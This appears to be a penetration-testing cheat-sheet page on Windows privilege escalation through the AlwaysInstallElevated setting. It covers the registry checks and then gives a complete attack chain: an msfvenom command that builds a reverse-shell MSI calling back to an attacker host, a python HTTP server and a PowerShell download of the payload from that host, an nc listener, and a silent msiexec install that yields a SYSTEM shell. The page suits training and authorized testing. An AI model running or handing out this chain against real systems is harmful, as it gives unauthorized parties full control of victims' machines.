PRIMARY CATEGORY → WINDOWS PRIVESC
| RESOURCES | |
|---|---|
| Hacktricks | See here |
| Windows Privesc - AlwaysInstallElevated | See here |
| Leveraging AlwaysInstallElevated for Windows PE | See here |
AlwaysInstallElevated
It is a Windows configuration that allows a non-privileged system user to install (execute) any MSI packages as NT Authority\System on a given system
This option is intented for corporate enviroments where System Administrators need to run some installation packages with elevated privileges even if the user does not have them
This feature can be enabled via two specific registry keys →
HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevatedHKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevatedCheck for Enabled Registry Keys
Just check if both keys, related to this Windows Feature/Configuration, are enabled
Enabled → 1 or 0x1
Reg Query
CMD & PS
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedGet-ItemProperty
PS
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevatedGet-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevatedPrivesc using a Malicious .MSI File
Crafting the Payload
MSFVenom
Once we verify that the above registry keys are enabled, we can craft a malicious .MSI file using msfvenom as follows
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --platform windows --arch x64 --format msi --out <OUTPUT_FILE>.msiFile Transfer
From the Attacker
python3 -m http.server <PORT>From the Target
(New-Object Net.WebClient).DownloadFile('http[s]://<ATTACKER_IP>:<PORT>/malicious.msi', 'C:\ProgramData\malicious.msi')Payload Execution
From the Attacker
rlwrap -CaR nc -nlvp <PORT>From the Target
msiexec /quiet /qn /i C:\ProgramData\malicious.msi